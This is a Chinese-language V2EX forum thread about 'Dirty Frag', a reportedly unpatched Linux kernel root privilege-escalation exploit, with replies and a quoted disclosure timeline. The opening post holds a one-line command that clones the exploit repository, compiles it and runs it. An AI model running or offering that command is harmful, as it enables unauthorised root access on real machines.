新一键 root 提权漏洞 dirtyfrag.io

V2EX = way to explore

V2EX 是一个关于分享和探索的地方

For Existing Member Sign In

› RANDOM.org 密码生成器

› uBlock

› Authy

› LastPass

› FreebuF.com

› Beebeeto

› Dashlane 密码管理器

https://dirtyfrag.io

验证

git clone https://github.com/V4bel/dirtyfrag.git && cd dirtyfrag && gcc -O0 -Wall -o exp exp.c -lutil && ./exp

root

提权

漏洞

37 replies • 2026-05-08 20:27:43 +08:00

SHIINASAMA

8h 20m ago

😨

xiaomushen

8h 18m ago

AI 时代，开源系统真的是危险，

cryptovae

7h 48m ago

看着就害怕

maocat

7h 43m ago

代码展现了作者对 Linux 内核网络栈、加密子系统、文件系统页面缓存的深刻理解，是一个教科书级别的高级漏洞利用实现

deepseek 的评价。

bill5500

7h 43m ago

又要忙起来了

wsseo

7h 37m ago

我的天

hefish

7h 30m ago

我擦，我最新的 debian 13 内核中招。。。
老的 debian12 最新内核，没事。。。。哈哈哈

netnr

7h 18m ago

解决了权限不足的问题 😀

Bronya

7h 13m ago

卧槽，前两天刚升级一遍防止 Copy Fail 的 CVE ，这又来了一个……

Lightbright

7h 9m ago

linux 忘记密码 root 怎么办.jpg

zsh2517

7h 8m ago

@Bronya 这个不用升级，因为还没补丁 /doge

https://github.com/V4bel/dirtyfrag/blob/master/assets/write-up.md#disclosure-timeline 里面有提到，原本五天后才会公布，但是有第三方违反规则公开了详情，于是 dirtyfrag 官方也公开了

2026-05-07: Submitted detailed information about the vulnerability and the exploit to the linux-distros mailing list. The embargo was set to 5 days, with an agreement that if a third party publishes the exploit on the internet during the embargo period, the Dirty Frag exploit would be published publicly.
2026-05-07: Detailed information and the exploit for this vulnerability were published publicly by an unrelated third party, breaking the embargo.
2026-05-07: After obtaining agreement from distribution maintainers to fully disclose Dirty Frag, the entire Dirty Frag document was published.